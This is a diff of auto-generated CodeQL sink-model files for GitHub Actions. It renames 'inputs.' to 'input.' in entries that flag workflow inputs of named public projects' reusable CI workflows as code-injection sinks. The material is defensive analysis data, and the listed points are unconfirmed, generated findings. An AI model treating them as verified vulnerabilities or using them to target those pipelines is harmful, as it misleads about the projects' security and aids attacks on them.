@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.pinned_mailu_version", "code-injection", "generated"] - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.mailu_version", "code-injection", "generated"] - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.docker_org", "code-injection", "generated"] \ No newline at end of file + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 1c3e5b565be8..8ef924313a99 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] - - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 7e8d8061fc5d..800c95ac1bfb 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_END", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_START", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.xml_command", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.cmake_command", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.DISTR", "code-injection", "generated"] \ No newline at end of file + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", 
"input.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 21e3fdb8874d..7a73bee6e57a 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 67e49a5716cb..08d64944bd9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-mahapps-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-colors-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.build-configuration", "code-injection", "generated"] \ No newline at end of file + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 2f30003359c4..d1097c47aeb0 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "inputs.compilers", "code-injection", "generated"] - - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "inputs.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index ed9091f37aed..8d7fb64ad3ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "inputs.nightly", "code-injection", "generated"] \ No newline at end of file + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d940c6a98b03..d7790e533c94 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.name", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.drivername", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "inputs.db-dump-url", "code-injection", "generated"] \ No newline at end of file + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "input.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 57b56667fbe9..093ed8bcfd16 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 4ffee539cd43..0ce99bc5fa9e 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.sm_version", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_namespaces", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_types", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_name", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.patternfile_name", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.service_url", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.deployment_url", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.provider", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] \ No newline at end of file + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_types", 
"code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "input.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index bfe525b2c0e2..2767dfbec767 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "inputs.board", "code-injection", "generated"] \ No newline at end of file + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "input.board", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 647bd0ae1939..2c5679329c13 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microcks/microcks/.github/workflows/package-native.yml", "*", "inputs.image-tag", "code-injection", "generated"] \ No newline at end of file + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b09fcb7f1026..b3e26a1cf137 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "inputs.success", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index f83101f511c6..963b64673a96 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "inputs.BACKEND_HOST", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index 7a60c93516de..fcf55466a9e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml 
@@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.tls", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.config", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.sanitize", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.plat", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.static", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.tls", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.config", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.sanitize", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.codecheck", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.systemcrypto", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.plat", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.config", "code-injection", 
"generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 14d7e741dac1..979bd414141d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "inputs.platformName", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index bb0e3a6a2b6b..55d810d29b53 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "inputs.patch", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index aa8f4e6b5186..19350db868c1 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraInitWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.reactNativeWindowsVersion", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.sampleName", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.sampleName", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.reactNativeWindowsVersion", "code-injection", "generated"] + - 
["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index c9af1a40ddc2..8d9af1a4e152 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "inputs.yarn-args", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 863bc645d989..47c09bf4f638 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.env", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.includes", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.tags", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.kinds", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.pkgs", "code-injection", "generated"] \ No newline at end of file + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.kinds", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 6e898a4e4524..4ff0273b47a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.storage", "code-injection", "generated"] - - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index a08a96a897e8..ba53c900ce87 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml 
